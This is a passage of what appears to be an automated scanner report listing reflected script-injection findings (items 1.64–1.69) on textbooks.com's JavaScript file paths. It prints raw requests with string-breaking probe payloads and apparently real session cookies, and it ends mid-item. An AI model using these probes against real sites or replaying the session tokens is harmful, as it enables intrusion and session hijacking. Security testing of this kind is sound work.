Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3626
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:51:58 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
pSearchReset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/js2f49c';bd59fafbda9/main.js'

</script>
...[SNIP]...

1.64. http://www.textbooks.com/js/main.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /js/main.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 66a8a'%3ba6336bb3b2d was submitted in the REST URL parameter 2. This input was echoed as 66a8a';a6336bb3b2d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/main.js66a8a'%3ba6336bb3b2d HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3626
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:52:00 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
eset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/js/main.js66a8a';a6336bb3b2d'

</script>
...[SNIP]...

1.65. http://www.textbooks.com/js/php.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /js/php.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f644d'%3b14ddfdf26d3 was submitted in the REST URL parameter 1. This input was echoed as f644d';14ddfdf26d3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsf644d'%3b14ddfdf26d3/php.js HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3625
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:51:58 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
pSearchReset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/jsf644d';14ddfdf26d3/php.js'

</script>
...[SNIP]...

1.66. http://www.textbooks.com/js/php.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /js/php.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d50ee'%3b79a43433c69 was submitted in the REST URL parameter 2. This input was echoed as d50ee';79a43433c69 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/php.jsd50ee'%3b79a43433c69 HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3625
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:51:59 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
Reset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/js/php.jsd50ee';79a43433c69'

</script>
...[SNIP]...

1.67. http://www.textbooks.com/js/s_code.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /js/s_code.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f132a'%3be1b2a7fb7eb was submitted in the REST URL parameter 1. This input was echoed as f132a';e1b2a7fb7eb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsf132a'%3be1b2a7fb7eb/s_code.js HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3628
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:51:54 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
pSearchReset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/jsf132a';e1b2a7fb7eb/s_code.js'

</script>
...[SNIP]...

1.68. http://www.textbooks.com/js/s_code.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /js/s_code.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 72fc8'%3bc42524fe374 was submitted in the REST URL parameter 2. This input was echoed as 72fc8';c42524fe374 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/s_code.js72fc8'%3bc42524fe374 HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3628
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:51:55 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
et() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/js/s_code.js72fc8';c42524fe374'

</script>
...[SNIP]...

1.69. http://www.textbooks.com/js/tbcart-ajax.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /js/tbcart-ajax.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff933'%3be319b3b570d was submitted in the REST URL parameter 1. This input was echoed as ff933';e319b3b570d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsff933'%3be319b3b570d/tbcart-ajax.js HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
